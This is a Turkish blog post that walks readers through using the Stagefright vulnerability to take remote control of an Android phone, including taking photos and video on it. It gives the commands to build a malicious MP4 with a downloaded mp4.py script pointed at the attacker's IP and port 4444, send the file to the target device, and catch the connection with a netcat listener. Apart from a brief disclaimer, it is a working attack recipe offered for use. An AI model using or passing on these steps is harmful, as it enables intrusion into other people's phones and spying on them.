Stagefright açığını kullanarak Android Cihazınızı kontrol etmek istiyorsanız bu yazı tam size göre.
Not: Bu açık Linux üzerinde denenmiştir ve çalışıyordur Windows ve Mac üzerinde çalışılabilirliği hakkında bir bilgimiz bulunmamaktadır.
Stagefright açığı kullanılarak Android Cihazları uzaktan kontrol etmek (fotoğraf, video çekmek vb) mümkün peki nedir bu Stagefrigt?
Stagefright güvenlik açığı ilk olarak Zimperium Labs mobil güvenlik uzmanı Joshua Drake tarafından fark edildi. Bu güvenlik açığı, Android işletim sistemindeki PDF gibi multimedya dosyalarının çalışması ve yönetilmesinde kullanılan Stagefright isimli bileşenden kaynaklanıyor ve hemen hemen bütün Android versiyonlarını etkileyebiliyor.
Bu açığı kullanmak için ilk önce cihazınızın Stagefright açığından etkilenip etkilenmediğini öğrenmeniz gerekiyor. Öğrenmek için Google Play Store üzerinden Stagefright Detector uygulamasını indirin ve testi yapın. Testin çoğu ve ya tamamı yeşil çıktı ise Cİhazınız Stagefright açığından korunmuş demektir, kırmızı satırlar var ise maalesef cihazınız Stagefright açığına karşı korunmasız demektir.
Not: Bu açığı yalnızca kendi cihazlarınızda test amaçlı kullanınız. Başkalarına ait cihazlarda bu tekniğin kullanılması yasa dışı olabilir ve bu konuda Tekno Bölge ekibi, yönetim ve yazarları sorumluluk kabul etmemektedir.
Stagefright açığının kullanımı:
- Buradan gerekli olan mp4.py dosyasını indirin
- Ctrl+Alt+T Tuşlarına basarak Uçbirimi açın
- Python paketi yüklü değilse
sudo apt-get install pythonkomutu ile yükleyin python mp4.py -p local-ip -p 4444komutunda local-ip yi kendi ip niz ile değiştirin. (Kendi İp adresinizi Uçbirimeifconfigkomutunu girerek bulabilirsiniz)- Bu komut AjayKulal.mp4 adında bir dosya oluşturacaktır, bu dosyayı test etmek istediğiniz cihaza gönderin
- Bu .mp4 dosyasını cihaza gönderdikten sonra Uçbirimde
netcat -l -p 4444yazarak dinleyiciyi başlatın.
İşlemler tamamlanmıştır. Android Cihazınızı Stagefright açığını kullanarak kontrol edebildiniz mi ?
